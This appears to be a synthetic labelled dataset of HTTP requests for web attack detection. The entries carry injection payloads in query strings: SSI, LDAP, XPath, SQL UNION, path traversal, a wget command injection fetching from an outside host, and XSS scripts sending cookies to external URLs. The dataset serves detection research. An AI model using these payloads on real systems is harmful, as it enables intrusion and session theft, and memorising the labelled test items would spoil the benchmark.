If-Range: Fri, 10 Jun 05 24:15:09 GMT
Max-Forwards: 5
MIME-Version: 4.7
Pragma: s4s=ip
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: AaaWvE cyatu3=ye8s5hk
Range: 78-
Referer: http://www.h4tq.net/bredktl.swf
TE: gzip;q=0.6,gzip;q=0.8,deflate
Trailer: Referer
User-Agent: ntnertlite (2q6724; ip_dCFjL; a.gi5P_o; unk4V4Vh)
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8256x1298
Via: HTTP/9.1 217.127.213.46, HTTP/5.1 35.43.162.99
Transfer-Encoding: deflate
Upgrade: 9tr9iu/0.9
Warning: 505 www.e3nDj.jpeg:48661 "atsjlrarlaaa" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36107
Start - Id: 39290
class: SSI
GET /Ksm1var5aMDSW.tiff?zc3eGOttt=O3gubty%3AwdLohearh%3A&3lDummroatmtrb=lwshutdownsoshTee+eUEhtpassnktlu&a915=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&dero=ebwpIGg6g6bi&tN7hsator=26&ho9qvaregolh=azte2sferoxp_9lrtmpnimg%29 HTTP/1.0
Host: 82.45.183.116
Connection: usEa
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: eeeAdgn=em
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="390"
Date: Tue, 12 Jul 05 08:44:15 GMT
ETag: W/"9ib8ik4X3d-J0zUTbY"
Expect: pra5=4Ete
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 27 Nov 07 09:36:57 CET
If-Unmodified-Since: Thu, 19 Oct 06 14:46:59 CET
If-Match: "HXJ5YO2A6Fz09._Jq"
If-None-Match: "xTGjCxAB6EEWL2yOtB"
If-Range: "A1fjsRu7LPIsI4wAdR"
Max-Forwards: 38
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: Digest nc=e472deD1
Range: 419016-,344-
Referer: http://www.uNee.st/OmysXpeu/afehr.html
TE: trailers,trailers
Trailer: Host
User-Agent: royaedaEwdnopyt
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 573x190
Via: 3.3 149.30.70.113:78675, 8.6 73.154.175.194
Transfer-Encoding: gzip
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 243 www.sr5ots.htm "h5poe8s" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 729426151535484
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39290
Start - Id: 37647
class: LdapInjection
PUT /e35Xp/dmaeot/e6LXi/oN37aX1Uju/h_IUCfneD33RdDxpFk9/tmcbfrydqMpseiestg/Dw_1gnyX2Xzv6/ouj.asp? HTTP/1.1
Content-Length: 126
Content-Language: l
Content-Encoding: identity
Content-Location: /iair/eqodxnt/or5ooeor/1yewds.png
Content-MD5: bnRlYWVmQ25jaW9lOTVpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 May 07 23:26:28 CET
Last-Modified: Sun, 07 Jan 07 21:38:09 GMT
Host: www.irris.uk
Connection: inhao
Accept: video/quicktime;q=0.2, image/jpeg, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=663
Client-ip: 76.236.29.239
Cookie: cehboltDsnte=769836639;dNrt=99471;5tzz=309
Cookie2: $Version="67"
Date: Sat, 20 Mar 04 17:01:02 UTC
ETag: "5CsxZ0n_JYvh4GoyRbX"
Expect: nuie
From: EEnaeq3@weaSbmldq.fr
If-Modified-Since: Thu, 04 Dec 08 09:04:30 GMT
If-Unmodified-Since: Thu, 28 Jul 05 09:51:38 CET
If-Match: "PQsJZLjFWJ6W1hgxzAU"
If-None-Match: "KL.pf_@gZIfH.q8Z"
If-Range: Sat, 14 Jun 08 22:28:16 CET
Max-Forwards: 3
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM dDlhZXU1bWRlZWFhZWV3YXI1eXNlTHBvb3h1b2h0b3QyZXNJb29sZQ==
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: /lcohats/oaap/fleee.tar.gz
TE: chunked
Trailer: TE
User-Agent: leGU/0.3.5.2
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 940x1719
Via: 6.3 www.ixees.html
Transfer-Encoding: gzip
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 189.116.98.106
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

T5Gogt=EetinHaelzree2tapn&elr49Fewr=tt)(&(objectClass =   br*)&a8rIaosirsaw=94152&imtr=eiT&veHEthAo=r?td7xi04)

End - Id: 37647
Start - Id: 43569
class: OsCommanding
GET /oCgYNvsnHGxJI1/iiccEsl/hlgnbxime/iX3N7ltHLzfu/lrcp0.js?szne=oeYnmicct&tmpxU-e4nVkU=9118146&q7EgusrJ=hcsjbunionsEt&tVajVl=1sotlteu28auSzyEo&Jlnw=%22++++%3B+%2Fusr%2Fbin%2Fwget+++++www.trasnaliaras.com%2Fis%3B HTTP/1.0
Host: 207.253.202.253
Connection: close
Accept: video/mpeg;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.9, deflate, identity
Accept-Language: oee0nhsn-dreunutc;q=0.1
Cache-Control: no-store
Cookie: HeoTti40teeg=25528;4_U5winnt1from=zonu;deleteDqtd6hinput6vg=UtqdbewI2tgREtae;5ZPrhNV=te7eis
Cookie2: $Version="361"
Date: Sun, 04 Oct 09 22:14:19 GMT
ETag: W/"2Mpn4nO2vwMkkK-Rd"
Expect: hOaepm
If-Modified-Since: Tue, 07 Aug 07 22:23:44 CET
If-Match: *
If-Range: Mon, 17 Mar 08 04:09:01 GMT
Max-Forwards: 6528
Referer: /ujderrnL/wonuln/OAogt/ex53/3guha.pdf
User-Agent: iUnePhP4eceeEnaL
Transfer-Encoding: compress

null

End - Id: 43569
Start - Id: 49641
class: XPathInjection
GET /n5ctsgaonee/irkpht5oon/Dd1linkGEe/Qdd9P0Pascript.php?nfhrr=w8of%27++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or++++%27tHa%27++%3D+%27&lsohfffEao2e1s=udzvf&-R4oLcGNH3p=1oeBT&8nvigbmitejmrcr=31433829 HTTP/1.0
Host: 132.215.147.146:7
Connection: keep-alive
Accept: application/zip, text/html, application/*;q=0.7
Accept-Charset: big5, windows-1253
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 181.220.88.111
Date: Wed, 23 May 07 17:29:27 CET
If-Modified-Since: Mon, 10 Jul 06 02:16:17 UTC
If-Unmodified-Since: Thu, 15 Oct 09 02:06:27 CET
If-Match: "9iZ4Tt51hxPE3a9Jr"
If-None-Match: "Rx8FF1UAXjy0sS-"
If-Range: Sun, 02 Dec 07 06:42:23 CET
Max-Forwards: 9419
MIME-Version: 8.5
Pragma: toS=teenfHn
Authorization: Basic ZTZ0aDppZnVt
Referer: /o2snial/egumicvs/4ttm/eventota/aeehlh.asmx
TE: trailers,gzip;q=0.6
User-Agent: Mozilla/6.8 (compatible; Konqueror/8.7; Open BSD i586; lCkjHnr8ti; isirnift)
Via: dvno/1.0 86.196.236.183:4835, 7.5 www.lFfj2wd.gif:95150, 1.7 www.xocUi.html
Transfer-Encoding: gzip
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 460757969488
----: ----------------

null

End - Id: 49641
Start - Id: 43176
class: OsCommanding
GET /27fnc/nr3Q4HRisboGOvL.jpg?ugulaS=ci%2Be&execH9Nussnb=eobh&0soore4eotw=%7Cid%26&tl=ipalshFartmp%5C&Eseu=tervN&7ulee93a=kyNToSSi&Bsystemy@rYqv7E7=toei&npwosiEdRlh=gb0vilthplinkrl%26+h&s1XYBtmp@hT=memtAh%2Fg&tmppsZNg=nrhrdtcEyradmin%3F%7E+d+tfg&tnnncSee=bhnechopimt&tug=ap&tc4eytueHs=l2p1kJrXotD&PEuQ=htacces HTTP/1.1
Host: www.xemft.ch:677
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: rorR9B-acn4;q=0.8
Cache-Control: no-store
Client-ip: 101.140.81.249
Cookie: vEenuoand4oogSe=Eeq2se6telnet;9l1i1ct=otoy7xce;iaOEtt=08467;eeu5ohlh=3001891
Cookie2: $Version="3"
Date: Fri, 30 Apr 10 15:03:59 GMT
ETag: "3n7cYjzbN.STqhi"
Expect: 100-continue
From: spog@iutmqee.net
If-Modified-Since: Fri, 05 Mar 10 06:21:51 GMT
If-Unmodified-Since: Sun, 01 Feb 04 16:25:21 CET
If-Match: "5_q@3@49fMZut0yT"
If-None-Match: "9G-r3zudstkL2b4S"
If-Range: "DrFnScXkp9v11pRz0s"
Max-Forwards: 0791
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: coloIh rs8x9a=2Iwcett
Authorization: Digest nc=aB8a6c30
Range: 332370-1588,656-95
Referer: http://www.tsortilT.uk/8azIo/ortsO/nJinc/ened.jsp
TE: trailers,deflate;q=0.3,trailers
Trailer: Authorization
User-Agent: Mozilla/7.0 (Windows; U; Windows NT 2.8; lh-un; rv:6.9.1) Gecko/86970902
UA-CPU: Sparc
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 953x846
Via: tie/9.3 38.211.133.187
Transfer-Encoding: deflate
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 415 2.136.43.50 "wzmsseuobh" "Mon, 09 Jul 07 20:41:04 CET"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 97812200258960530552
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43176
Start - Id: 39437
class: SSI
GET /xrpolArYqR/uDcrneets.mdb?7group by4h9V2WdC=61&qdfypAOy=e%25ith&trpp4=no&ahtid=qc&d0b=%3C%21--%23email+fromhost%3D%22www.ewratedo.com%22+tohost%3D%22mailbox.5iby.com%22+message%3D%22xfeeI+Ndtrwm+wIh+rnPInd%22+fromaddress%3D%22Oc9E5.com%22+toaddress%3D%22Wefe.hicbp.com%22+subject%3D%22wm%22+sender%3D%22e5.com%22+replyto%3D%22watvt.com%22+cc%3D%22ot%22+inreplyto%3D%22AeoCo+anuo+a5%22+id%3D%22dd2timail%22+--%3E&eco2raseTe6=c%2B&homeBipVlibykT=4081264&yos=wdQ7fpz&lsareet5htieNv=8269425&stiplNqndOdquao=wonle HTTP/1.0
Host: www.osmnl3.gov:80
Connection: ABathhtm
Accept: application/*;q=0.3, text/*;q=0.7, text/*
Accept-Charset: isiri-3342, x-mac-chinesesimp;q=0.6, x-mac-roman;q=0.3, windows-1254;q=0.7
Accept-Encoding: deflate;q=0.7
Accept-Language: *
Cache-Control: nhgwbw=sn8ooS4
Client-ip: 69.64.197.144
Cookie: ksZLQo@L0Z7=4e+ie'eeifguilinput4Som;idrdeCp=i;Yitgmhzo=06791502
Cookie2: $Version="308"
Date: Thu, 27 Oct 05 02:25:53 GMT
ETag: W/"JVqyQgA0PLhI.NY2AP"
Expect: 100-continue
From: 1y6tgnnt@o4or4ie9a.com
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: *
If-None-Match: *
If-Range: "VME@8FxxahI92mwwUeN"
Max-Forwards: 1086
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic cWFxczpsZndhaXluZQ==
Range: 73-4339,804-,5553-97644
Referer: http://www.siamAyhs.fr/es2rMCo/9imacee/yf5oaS.php3
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/0.6 (X11; U; SunOS sun4u 2.3; ld-tt; rv:6.0.8) Gecko/63813055
UA-CPU: PowerPC
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: eMrfj/9.9 57.38.110.68:8462
Transfer-Encoding: gzip
Upgrade: r94e/0.1, hme/5.5, ammrcS/1.0, aznO/2.8
Warning: 428 www.oheYza.htm "hrtat8k" "Sat, 01 Oct 05 21:42:07 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39437
Start - Id: 37064
class: LdapInjection
GET /WdeoE/1ncownif/voFtsEf@R4fb/pxyLtL/d3uTerrsdEbfoo5s/eaipa8/iEKunv0dv7v/tlpsTY99eY_L3666uFR/eR/QstyleVFWA.aspx?wcT=rxq%3E%2F%40onhextIE&tti0airos=%29+%28%7C++%28++++cn%3D*o+++%27brien*+++%29%28mail%3D*o++%27brien*+++%29+&wfhokig7=2955911541&7rTBkgH2oMji=843286076&i1nSgxie=06&nslm3r59she=eavuz HTTP/1.1
Host: 132.105.147.161:950
Connection: en1h
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 229.87.115.154
Cookie: leesi4i3=3
Cookie2: $Version="212"
Date: Thu, 02 Sep 04 13:02:46 CET
ETag: "3V52_A2tnUSoPxJz"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Tue, 31 Aug 04 12:17:46 CET
If-Match: "81I0yXm7WJssAtFypo0U"
If-None-Match: "iH6GTZsjCvihiJ.7"
If-Range: *
Max-Forwards: 497
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: pbvh geI1d=2fi3a
Authorization: Digest nc=1E7CAAFB
Range: 03242-,-0
Referer: http://2dlea.cz/TEsis/cwld.css
TE: gzip;q=0.6
Trailer: If-Modified-Since
User-Agent: t2eeneRifyb
UA-CPU: PowerPC
UA-Disp: 428,496,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1905x9959
Via: HTTP/8.7 86.180.61.185
Transfer-Encoding: compress
Upgrade: ESst/3.1
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 595061014884085769
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37064
Start - Id: 40577
class: SSI
GET /VeuC1G/rNHAL/dnSarefnisswX4oeCAa/phlelnna4e/heMbOea.png?khcutv=+Sihn+ide&oJoeHdyatnsTerv=%3C%21--++++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E HTTP/1.0
Host: 35.220.155.244
Connection: close
Accept: image/*, audio/basic, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n7l-ethr4p1w, oiaslsE-1nd, ltEexeta-mimesimt, osxm-h5eie2e;q=0.5, 57Rerr-m6e;q=0.1
Cache-Control: no-cache
Client-ip: 235.213.156.191
Cookie: daAsdosh=o8QE97;smarrtzscc4rH=118570;chaoat5Xmqsd=2885145
Cookie2: $Version="656"
Date: Wed, 05 Jan 05 17:08:26 CET
ETag: "8D.wztjHo2Ak06X"
Expect: rentuei=eesik4r;tyjZRs
From: ciHn@mdreeh.gov
If-Modified-Since: Sat, 12 Dec 09 05:59:24 GMT
If-Unmodified-Since: Sun, 19 Dec 04 12:28:39 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 11
MIME-Version: 9.1
Pragma: tE=ter
Proxy-Authorization: Basic ZW5zeW80OmV0ZWF5
Authorization: NTLM VXJ0eWEyYWh0aHJldHJhcnZyaXRnZ29TaGFvOWNsZXJ0Y3R0b2lv
Range: -296381
Referer: /hefe/igge/oFinusn/eprtizo/soah.gif
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.1 (compatible; Konqueror/3.6; Windows NT; dd4Say; erhl)
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: FTP/6.4 193.1.211.237:356
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 218.205.84.216
X-Serial-Number: 69115
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40577
Start - Id: 49094
class: XPathInjection
GET /fromo/skj@37/iS9YYK/GdC/kiOK.js?ziir6l=056358774&euRT=107827&nEnb=psautoexecBeHwhomeoonb+dsave%27or&h8at0laWs3s=1Jy&rssismv=xaeq%2Ftssol%2FHnaata%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D809%5D+++or++++%27edOhL8x%27%3D+%27&iardYomsgiS=s3R1f&usthead9=sn6havingubrqIposition+2+nt&hunibaoeAEex0o=aietcmItiisdocument3&hdndr5o=uv8&yhsya=235&tWhnaitbsi=yv HTTP/1.1
Host: www.ge1W.uk
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: koi8, windows-1253, iso-8859-1, euc-tw
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: min-fresh=72799
Client-ip: 215.194.111.216
Cookie: 7cAcai4otqttnp9=3;l9edatAet=T(csn1l7;p7DX1UzQj_td=koaeabi3unauuimn
Cookie2: $Version="21"
Date: Sun, 07 Mar 04 19:57:21 GMT
ETag: "9zbdhmHRPBJn6NucEb"
Expect: dfeh5=siacsoEI
From: oayjh@w9ulna6.biz
If-Modified-Since: Wed, 07 Mar 07 13:58:05 GMT
If-Unmodified-Since: Fri, 02 Dec 05 16:21:54 GMT
If-Match: "YtrAA4kBGnI5i9o"
If-None-Match: "YVW6aYEA78kymeS"
If-Range: Sun, 13 Nov 05 20:50:30 UTC
Max-Forwards: 60
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: bAo1v ibijaido=uede
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: /itbe/eext/oeet/tacss90.doc
TE: deflate
Trailer: Referer
User-Agent: nhissmttoe (qBy1bD7; ivym.nn)
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: 8.9 www.fhLf.jpg
Transfer-Encoding: deflate
Upgrade: aau/4.8
Warning: 835 138.65.160.104 "Deeungnqc1e8n" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49094
Start - Id: 44964
class: PathTransversal
GET /aIfKH0TYesAAbt.nrBO/documentvdjDhWq33FHB/JD1inwvqSl./0dT3ntneEnwHS/jf.cc5-p1Jf8Irx.mdb?msiuhey=sperlo&oahhuneerdmn=.%2F..%2F..%2F..%2F..%2F..%2F&yrvata49sl3nlos=nbworA&_qYfUH@S=aipax8llnmeiocaa HTTP/1.0
Host: 95.251.43.81
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: eiucli-oa;q=0.6, 6osi14e-tl6Hbmc
Cache-Control: only-if-cached
Client-ip: 141.6.207.75
Cookie: btz=998;ri29itqihAelex=723979;eo=9;Nhr0doaddeseokn=8selreeesetssc
Cookie2: $Version="02"
Date: Fri, 20 Jul 07 05:03:58 GMT
ETag: W/"@Ha_U7Oeumx8BwDN1Ut."
Expect: 100-continue
If-Modified-Since: Sun, 15 Jan 06 10:48:12 UTC
If-Unmodified-Since: Sun, 19 Nov 06 21:36:30 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Jul 08 15:39:37 CET
Max-Forwards: 8526
MIME-Version: 0.8
Pragma: l4hrjfnb=he
Proxy-Authorization: NTLM ZWhkeDZyMW1hQTFyZGROZm5pdnNTZWx0cnRlb293b2FydkR1OXQ=
Authorization: Digest nonce
Range: -972278
Referer: /wh7sn5.pl
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 3.2; r4-IE; rv:6.7.6) Gecko/26154685
UA-CPU: Sparc
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 298x3014
Via: 1.0 16.3.246.115, FTP/1.4 www.muc4tsEs.htm
Transfer-Encoding: kr9a
Upgrade: mAelaA/3.4, 5lote/9.4, GsasM/7.6, ho40u/4.6, tead/1.7
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44964
Start - Id: 42230
class: SqlInjection
GET /9M.5m_/io5ALphpXj5xmdiv/2a1e6oi8Eltt/2iyinemeug/yCkMXIL7C1BBepKKjAip/tHXw-ctelnetA.jsp?ea=2549&hwstib4a=3HwrP39elR&Httision2e1nmav=907&NIuTYNcopyb=tee&nnv8hs8eb=uhnLofncSi&anNmoqi5Tc=L-EChke7&NTwVRRuR=68&ietiAu=edocument%3El&Zq9aMB=1crtmrdit&ruoe8nE=600187566&vEdztElyige9=9054&14Oeddeudp=68&DhumailC9fRq=%27++++%29+++UNION+ALL+++SELECT+++++1380+++++FROM+++mr++WHERE+%28+%27%27+%3D+%27 HTTP/1.1
Host: 141.44.118.38:9481
Connection: ftAIgtcs
Accept: audio/*, audio/basic, application/*
Accept-Charset: *
Accept-Encoding: deflate, gzip
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: qinlra0e=3888;rsoshs=0497;1s=59297554;empm=36017;hsEe2ia=o;hhh_8objectfZ=p bco
Cookie2: $Version="306"
Date: Tue, 13 Feb 07 19:19:27 UTC
ETag: W/"PpexkksMSt4M7_y6m"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Fri, 16 Sep 05 16:32:19 CET
If-Unmodified-Since: Thu, 07 Jun 07 11:18:37 GMT
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: "pv@qrWadt1tIHUizA"
Max-Forwards: 69
MIME-Version: 1.3
Pragma: 0tmeey=wlEwgsir
Proxy-Authorization: Digest cnonce="trns"
Authorization: Digest nc=bCC0Fe6c
Range: 4539-14148,-19,934-
Referer: /SkIxIb/t2bkuN2/eei2me.dll
TE: chunked;q=0.5
Trailer: If-Range
User-Agent: Mozilla/5.3 (X11; U; Solaris 5.3; t9-nr; rv:3.8.6) Gecko/05515675
UA-CPU: x86
UA-Disp: 4436,548,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: 0.5 98.49.7.41
Transfer-Encoding: drmito; 7hrdthc=indonCo
Upgrade: iunoNg/9.6
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42230
Start - Id: 39278
class: SSI
GET /hy/nesashvsoPoolaw1ncl/hZDeiodRMC/0h/yF4CiIObRMccXdA9/mFbioNtdm1aTjnt/ebssfxol/-sPbBaxTrcD/kqLffKWUz.tiff?nsgehTzmotin=pRallKnghtaccests%3Dbn3&ltoedwgf9wsiva=91219377&T6Atk=40&aar=eC08&1etaatpcrn9tnat=h8tcoutrEhvetfel&HlAs=091794934&dropB4Liframehttp-_=%3C%21--%23email+fromhost%3D%22www.oaoess.com%22+tohost%3D%22mailbox.tep.com%22+message%3D%22ohen+xxhedaY+dhtm+ynhw%22+fromaddress%3D%22sl5t6.com%22+toaddress%3D%22tmfce.cn.com%22+subject%3D%22ese%22+sender%3D%22rre.com%22+replyto%3D%225tueo.com%22+cc%3D%22k64%22+inreplyto%3D%22o0eii+lhe+4%22+id%3D%22seiomail%22+--%3E&efwHiiatrb7zor=%5D6o&wrniaorbk=05651 HTTP/1.0
Host: 118.67.55.205:80
Connection: omCsgq
Accept: */*
Accept-Charset: iso-2022-jp;q=0.1, x-mac-icelandic;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0953
Client-ip: 124.35.102.241
Cookie: ol=8e
Cookie2: $Version="26"
Date: Sun, 13 Jun 04 13:14:33 CET
ETag: W/"7PpJzZ6D.Le.Qph7"
Expect: 100-continue
From: tdoqaue@tuogttti.uk
If-Modified-Since: Tue, 18 Sep 07 18:48:48 CET
If-Unmodified-Since: Sun, 18 Dec 05 03:53:40 CET
If-Match: *
If-None-Match: "YJ6_IBEgLCAuFLCve"
If-Range: Thu, 04 Mar 04 02:49:47 GMT
Max-Forwards: 901
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: NTLM dEVldWpycHRvZW50ZXpicHNtZXN4b2Vpdm50bjdobmFidQ==
Range: -219632,263179-06080,264504-7
Referer: http://dhc9t4g0.org/egmnl/hss88nh/tcJcjwst.msf
TE: deflate
Trailer: Via
User-Agent: t__OX5GaC http://www.hm9cm.net
UA-CPU: MIPS
UA-Disp: 844,3342,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 320x017
Via: FTP/4.4 www.7stn.png:0, pbpm/4.8 www.ccahse.css
Transfer-Encoding: deflate
Upgrade: dde/7.5
Warning: 372 www.exhwh.jpeg "h0t3bfwddlgralo9" "Thu, 10 Jun 04 17:14:38 UTC"
X-Forwarded-For: 190.235.131.102
X-Serial-Number: 420641623640
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39278
Start - Id: 47472
class: XSS
GET /hbetehnaThYs0cq/um/access_logPmi/ekiiFetwqshs/PVCclocation/yORPqTetcmgtAN/r8KM.u16m/cte/oRaXSvHsmc/eAYKf00r3TXVVUfI.bin?ci1et9s=cPothtsltr%3C&54h.2SgxPv=7495783&s0hehs4paun=62&nrdeveaie=notubdeefX6ret&m@6STQsSHd=mezeegmenuanpri9s&atbmroehe=7aiei2mrepeecu&nTiueoeyj=eheiwnmhu&35.wBU=%3C%3Cscript+%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.chtrng.com%2Fcgi-bin%2Fas.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E&ewil5aqrt=utnwtnsc2daeuatuod&0oit=6&tsaooawaIk=33&i0bsinchn=n%3Bwesamigpabcig&ta=9625564 HTTP/1.0
Host: 158.157.156.213
Connection: tsdn
Accept: video/*, text/*;q=0.5, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: sbh-uirn, lh-hs;q=0.5
Cache-Control: no-transform
Client-ip: 42.218.232.78
Cookie: onw=nph-hWsamU3tlmnullMjadmin;PntqHbStmpEINH=Ob=i;harteh=8939
Cookie2: $Version="37"
Date: Thu, 26 Jan 06 24:06:22 UTC
ETag: W/"s9.PqrmO-e_jWz@06.s"
Expect: Spnntt
From: ghun@e9ggr0ugra.com
If-Modified-Since: Wed, 11 Oct 06 07:18:41 GMT
If-Unmodified-Since: Fri, 06 Nov 09 01:41:20 UTC
If-Match: *
If-None-Match: *
If-Range: "VprYULafqAsgReKNg"
Max-Forwards: 20
MIME-Version: 5.1
Pragma: nanI=uz4e
Proxy-Authorization: ohttg htuneE=et8ju
Authorization: Digest algorithm=MD5-sess
Range: 1-845224,09-
Referer: http://ldeyneii.uk/Cosnnw/rane.wav
TE: trailers,trailers,gzip;q=0.0
Trailer: If-Match
User-Agent: Mozilla/6.1 (X11; U; Unix 0.8; 0y-ey; rv:5.0.1) Gecko/75590091
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 747x653
Via: FTP/1.6 www.edne4oe.html:75, 2.3 110.115.86.61, FTP/0.4 www.homagaau.png
Transfer-Encoding: inr33
Upgrade: rshhh0/1.3
Warning: 434 www.stheqS.htm "2se9l4zCow3t" "Tue, 16 Nov 04 07:44:37 CET"
X-Forwarded-For: 250.184.177.153
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47472
Start - Id: 47574
class: XSS
GET /VT/oT4@hhaQvAu3style4T/qiIsi/vdscpg/XSYeNU9Y7aq/heyQsr7itTted/asnht2mHhnfslr.mdb?7W3rcp0E=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F193.173.178.135%2Felvede.exe%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&za.mfvOjR=Euwnna&e5yamyanrSuor=liro316a4eco&4yahl37=rmmiqr4%268e HTTP/1.0
Host: www.drh3mt.fr
Connection: ugznfp
Accept: */*;q=0.2
Accept-Charset: euc-jp, iso-8859-4;q=0.2
